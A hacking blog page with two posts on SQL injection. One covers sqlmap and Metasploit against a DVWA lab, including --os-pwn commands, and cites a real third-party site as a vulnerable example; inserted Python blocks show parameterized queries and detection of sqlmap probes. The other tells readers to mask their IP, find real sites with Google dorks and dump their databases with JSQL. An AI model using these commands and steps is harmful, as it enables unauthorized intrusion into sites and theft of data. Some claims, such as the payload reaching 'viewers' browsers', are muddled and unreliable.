Showing posts with label SQL injection. Show all posts

Saturday, August 17, 2019

SQL injection to Metasploit session

Wassap people, I am him, the one and only Laughing Man, back with yet another post, this one on SQL injection to a Metasploit session. I know most of you are thinking "Laughing Man, you're talking shit". Well, sorry lads, I'm not. Metasploit Framework has many uses, not just payloads; it can do almost anything from recon to exploiting. So for this I've set up a lab with DVWA, so let's start, lads.

What is SQL injection

SQL injection is a code injection technique that might destroy your database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements, via web page input.

What is Metasploit Framework

The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development.

What is DVWA

DVWA is the Damn Vulnerable Web App, coded in PHP/MySQL. Seriously, it is too vulnerable. In this app security professionals and ethical hackers test their skills and run these tools in a legal environment. It also helps web developers better understand the processes of securing web applications, and teachers/students to teach/learn web application security in a safe environment.
The aim of DVWA is to practice some of the most common web vulnerabilities, with various difficulty levels.

What is Burp Suite

Burp Suite is a Java-based web penetration testing framework. It has become an industry-standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications.

What is sqlmap

sqlmap is open source software that is used to detect and exploit database vulnerabilities and provides options for injecting malicious code into them. It is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws, providing its user interface in the terminal.

How to perform the attack

First of all we get our target. This is my target: http://192.168.8.101/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#

Now that I have my target I can check whether it is vulnerable to SQL injection. What we do is put a ' right after the 1 in the URL, so the URL looks like this: http://192.168.8.101/DVWA/vulnerabilities/sqli/?id=1'&Submit=Submit#

Once you see this message when you add the ' at the end of the URL:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

For example, with http://www.asfaa.org/members.php?id=1' when we add the ' at the end of the URL it tells us there's an error:

"Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /nfs/c05/h02/mnt/83231/domains/asfaa.org/html/members.php on line 67"

When we get this error we can use tools like sqlmap, Burp Suite etc.
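Why the single quote produces a database error, and what removes it, as an added example that is not code from the original post or from DVWA. It models the `id` lookup with Python's sqlite3 as a stand-in for PHP/MariaDB (so the error wording differs); the table, rows and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the lab's users table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("1", "admin", "admin"), ("2", "Gordon", "Brown")])
    return db

def lookup_vulnerable(db, user_id):
    """Concatenates input into the SQL text, so a quote changes the statement itself.
    Returns (rows, error text sent back to the client)."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    try:
        return db.execute(query).fetchall(), None
    except sqlite3.Error as exc:
        # Echoing the raw database error is what confirms the flaw to the person probing.
        return [], str(exc)

def lookup_hardened(db, user_id):
    """Binds input as a parameter (it stays data) and keeps DB errors server-side."""
    try:
        rows = db.execute(
            "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
        ).fetchall()
        return rows, None
    except sqlite3.Error:
        return [], "internal error"  # details belong in the server log only

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print(repr(value), "vulnerable:", lookup_vulnerable(db, value))
        print(repr(value), "hardened:  ", lookup_hardened(db, value))
```

With the bound parameter, `1'` is just an id that matches no row, so the page has no syntax error to show.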

Now we need to set up the Burp Suite proxy in Firefox, so type about:preferences into the URL bar in Firefox to get the settings, scroll down to Network and set the proxy for Burp Suite.

Now we load up Burp Suite: open the terminal and type burpsuite, or go to the top left of the screen to Applications, then Web Application Analysis, and click Burp Suite.

Now when we add the ' to the URL, Burp Suite will pop up.

The cookie we need is Cookie: security=low; security=low; PHPSESSID=4kaa6819siab01k545959q45v0

Now we open a new terminal and type:

sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --dbs

Now we type:

sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --msf-path=/usr/share/metasploit-framework/ --os-pwn --tmp-path="C:/Docments and settings/Administrator/Local Settings/Temp"

Now we pick the payload; I mostly pick PHP.

This will add the payload to the site and inject it into the browser of the viewers.

This shows the proof it was connected.

There ya have it, lads and gals: how to use sqlmap to get a Metasploit session. Don't use this for the wrong reasons; hacking is against the law unless you have the consent of the owner.
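What the quote test and the sqlmap runs above look like from the web server's side, as an added example that is not part of the original post. The log lines are constructed in Apache combined format (client IP, timestamps and the sqlmap version string are made up), and `flag_sqli_probes` is a hypothetical helper name.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" format: ip, method, request target, status, User-Agent
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '192.168.8.50 - - [17/Aug/2019:10:01:02 +0000] "GET /DVWA/vulnerabilities/sqli/'
    '?id=1&Submit=Submit HTTP/1.1" 200 1523 "-" "Mozilla/5.0 (X11; Linux x86_64; '
    'rv:68.0) Gecko/20100101 Firefox/68.0"',
    '192.168.8.50 - - [17/Aug/2019:10:01:40 +0000] "GET /DVWA/vulnerabilities/sqli/'
    '?id=1%27&Submit=Submit HTTP/1.1" 200 412 "-" "Mozilla/5.0 (X11; Linux x86_64; '
    'rv:68.0) Gecko/20100101 Firefox/68.0"',
    '192.168.8.50 - - [17/Aug/2019:10:05:13 +0000] "POST /DVWA/vulnerabilities/sqli/'
    ' HTTP/1.1" 200 1523 "-" "sqlmap/1.3.8#stable (http://sqlmap.org)"',
]

def flag_sqli_probes(lines, param="id"):
    """Return (line_number, client_ip, reasons) for requests worth a closer look."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not in combined format, skip rather than guess
        ip, _method, target, _status, agent = match.groups()
        reasons = []
        if agent.lower().startswith("sqlmap/"):
            reasons.append("sqlmap default User-Agent")
        # parse_qsl percent-decodes, so %27 and a raw ' are treated the same
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if key == param and "'" in value:
                reasons.append("quote in %s parameter" % param)
        if reasons:
            findings.append((number, ip, reasons))
    return findings

if __name__ == "__main__":
    for finding in flag_sqli_probes(SAMPLE_LOG):
        print(finding)
```

POST bodies are not written to the access log, so the `--data` requests show up here only through the User-Agent; that header is client-controlled, which makes this a cheap signal to alert on rather than a control.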

Friday, March 8, 2019

Hacking with JSQL on Kali Linux

All right my little noobs, so due to my Google dorks post I might as well show u how to use them in an attack. Since my man nife did sqlmap, u can check it out here --> Sql-map basics

I am going to show you how to use JSQL on Kali. First off, you need to hide your IP, so check out this post for changing DNS --> Changing dns

Now I want u to download 4nonimizer (or git clone it, same thing) and install it:
git clone https://github.com/Hackingriseofficial/4nonimizer
cd 4nonimizer
chmod +x 4nonimizer
./4nonimizer install

By default vpnbook is the main VPN; u can get the username and password at VPNBOOK.
Once it's installed and working, open Firefox and type any of the Google sqldorks <-- here 🙂 Copy one, paste it into Google and hit search.
When you get the URL u wanna hack, open it and add ' at the end of the URL. If u get a MySQL error u can hack it: copy the URL without the ' and open JSQL under Database Assessment on the Kali menu, paste the URL into the attack bar and hit enter.

Just let it run and there you go, u got the database.

CONGRATS UR A SCRIPT KIDDIE LOL 😀

HAPPY HACKING LADS